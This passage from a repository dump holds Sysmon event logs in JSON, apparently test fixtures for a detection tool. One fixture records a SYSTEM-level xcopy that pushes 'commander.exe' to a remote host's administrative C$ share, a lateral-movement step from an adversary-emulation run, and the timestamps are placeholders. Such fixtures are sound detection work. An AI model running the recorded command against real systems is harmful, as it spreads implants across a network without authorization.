"49F1AF32-8838-59C1-0000-0010C3C84700", 16 | "ProcessId": "3440", 17 | "TerminalSessionId": "0", 18 | "User": "NT AUTHORITY\\SYSTEM", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "811124", 27 | "Execution": { 28 | "ProcessID": "1332", 29 | "ThreadID": "1924" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/Xcopy.exe.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "xcopy C:\\commander.exe \\\\calderadc\\c$\\commander.exe", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Extended Copy Utility", 8 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 9 | "Hashes": "SHA1=0A49CA5B46210824AC22D0B8DC43EF5E7B6D2989,MD5=20CF8728C55A8743AAC86FB8D30EA898,SHA256=32EE791AA61BFE60A28A788663E15376DA83D7B20E133F6F96F77C54F262FCC1,IMPHASH=46A0EA2A9F4C86BD33243A6B3C8ED68F", 10 | "Image": "C:\\Windows\\System32\\xcopy.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{49F1AF32-3AE3-5AC7-0000-002039031400}", 13 | "LogonId": "0x140339", 14 | "ParentCommandLine": "cmd.exe /c echo F | xcopy C:\\commander.exe \\\\calderadc\\c$\\commander.exe", 15 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 16 | "ParentProcessGuid": "{49F1AF32-3AE3-5AC7-0000-00107C031400}", 17 | "ParentProcessId": "2944", 18 | "ProcessGuid": "{49F1AF32-3AE3-5AC7-0000-00102D081400}", 19 | "ProcessId": "1216", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "914689", 31 | "Execution": { 32 | "ProcessID": "1456", 33 | "ThreadID": "1712" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | --------------------------------------------------------------------------------